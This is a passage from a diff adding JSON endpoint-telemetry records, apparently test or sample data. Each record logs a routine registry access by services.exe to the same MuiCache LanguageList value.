Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 